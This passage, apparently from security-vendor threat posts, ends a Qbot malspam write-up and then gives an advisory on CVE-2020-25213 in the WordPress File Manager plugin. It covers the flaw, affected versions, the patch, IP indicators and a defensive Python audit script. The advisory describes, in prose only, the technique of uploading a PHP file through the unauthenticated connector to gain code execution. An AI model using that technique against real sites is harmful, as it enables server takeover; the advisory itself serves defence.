This new Trojan is then executed and performs malicious activities such as gathering data from the victim's machine. During analysis we observed that it created a .dat file containing encrypted data.

It comes as no surprise that cybercriminals take advantage of a crisis: we have seen a growing number of malware samples using the pandemic and current events such as the BLM protests, and now the U.S. presidential election, to spread.

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Malspam.VBA (Trojan)
  • GAV: Qbot.A (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

CVE-2020-25213: WordPress plugin wp-file-manager actively being exploited in the wild

WordPress is a free and open-source content management system written in PHP. It is used by more than 60 million websites, and roughly 38% of the web is built on it. Its plugin architecture allows users to extend its features and functionality to tailor websites to their specific needs.

Vulnerability | CVE-2020-25213:

An improper access control vulnerability has been reported in the File Manager plugin for WordPress. The vulnerability is due to missing access control on the connector.minimal.php file when uploading files. An unauthenticated remote attacker can exploit it by uploading a file to the target system; a successful attack results in code execution in the security context of the WordPress server.

The vulnerable file is connector.minimal.php in wp-content/plugins/wp-file-manager/lib/php/, and it can be reached by an unauthenticated attacker. connector.minimal.php loads elFinderConnector.class.php, which reads HTTP request parameters and dispatches File Manager operations such as file upload, but connector.minimal.php performs no authorization check, such as verifying the privileges of the requesting user. As a result, an unauthenticated attacker can upload arbitrary files, such as a malicious PHP file, to the server, potentially leading to arbitrary code execution.

Exploit:

In the above exploit request, the PHP file "test_php_info.php" can be replaced with any file the attacker wants to upload to the server. Besides the "upload" command, the "mkfile" and "put" commands available in elFinder could be used to write a PHP file into the files directory and later achieve remote code execution.

Trend Chart:

Patch:
The following products are affected by this vulnerability:
• File Manager plugin for WordPress 6.0 to 6.8
• File Manager Pro plugin for WordPress 7.6 to 7.8

The File Manager plugin patched the issue by removing the lib/php/connector.minimal.php file from the plugin. Manually removing this file also prevents attackers from exploiting this vulnerability.

Refer to the vendor advisory here.
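Because the vendor fix is simply the absence of one file, an on-disk check is the most reliable way to audit a fleet. The following is an added example for this page (not the plugin's or SonicWall's code): it reports whether connector.minimal.php is present under a WordPress root, compares the plugin's declared version against the 6.0 to 6.8 range from the advisory, and can remove the file. The fixture layout and the file-manager.php name are constructed for the test; the Version header format is the standard WordPress plugin header.

```python
"""Added example, not the plugin's or SonicWall's code: audit a WordPress
install on disk for the CVE-2020-25213 exposure and, on request, apply the same
fix the vendor shipped (remove the unauthenticated elFinder connector)."""
import re
import tempfile
from pathlib import Path

PLUGIN_DIR = Path("wp-content/plugins/wp-file-manager")
CONNECTOR = PLUGIN_DIR / "lib/php/connector.minimal.php"
# Standard WordPress plugin header line, e.g. " * Version: 6.8"
VERSION_RE = re.compile(r"^\s*\*?\s*Version:\s*([0-9]+(?:\.[0-9]+)*)\s*$", re.MULTILINE)
VULNERABLE_MIN, VULNERABLE_MAX = (6, 0), (6, 8)  # File Manager 6.0 to 6.8 per the advisory


def plugin_version(plugin_dir: Path):
    """Return the plugin's declared version as a tuple of ints, or None if no header is found."""
    for php in sorted(plugin_dir.glob("*.php")):
        match = VERSION_RE.search(php.read_text(errors="replace"))
        if match:
            return tuple(int(part) for part in match.group(1).split("."))
    return None


def audit(wp_root: Path, remediate: bool = False) -> dict:
    """The connector file, not the version string, is what an attacker can reach."""
    plugin_dir = wp_root / PLUGIN_DIR
    connector = wp_root / CONNECTOR
    version = plugin_version(plugin_dir) if plugin_dir.is_dir() else None
    in_range = version is not None and VULNERABLE_MIN <= version[:2] <= VULNERABLE_MAX
    result = {
        "installed": plugin_dir.is_dir(),
        "version": version,
        "version_in_advisory_range": in_range,
        "connector_present": connector.is_file(),
        "removed": False,
    }
    if remediate and connector.is_file():
        connector.unlink()
        result["removed"] = True
        result["connector_present"] = False
    return result


def make_fixture(version: str, with_connector: bool) -> Path:
    """Constructed on-disk layout for testing; real installs contain far more files."""
    root = Path(tempfile.mkdtemp())
    plugin_dir = root / PLUGIN_DIR
    plugin_dir.mkdir(parents=True)
    (plugin_dir / "file-manager.php").write_text(
        f"<?php\n/*\n * Plugin Name: File Manager\n * Version: {version}\n */\n"
    )
    if with_connector:
        (root / CONNECTOR).parent.mkdir(parents=True)
        (root / CONNECTOR).write_text("<?php // elFinder connector stub\n")
    return root


if __name__ == "__main__":
    print("exposed 6.8:", audit(make_fixture("6.8", True)))
    print("patched 6.9:", audit(make_fixture("6.9", False)))
```

Report on the file rather than the version: a site that removed the connector by hand while still declaring 6.8 is not exposed, and a site that restored the file from a backup after upgrading is, whatever the header says.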

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 15205 WordPress wp-file-manager Plugin Remote Code Execution

Indicators of compromise:
13.85.84.182
176.113.115.89
193.27.229.26
13.82.220.36
20.185.0.202
18.207.254.243
51.11.136.167
52.186.156.31
34.226.244.53
18.207.224.249
37.59.35.206
160.20.147.136
161.35.90.11
13.66.185.182
104.248.238.198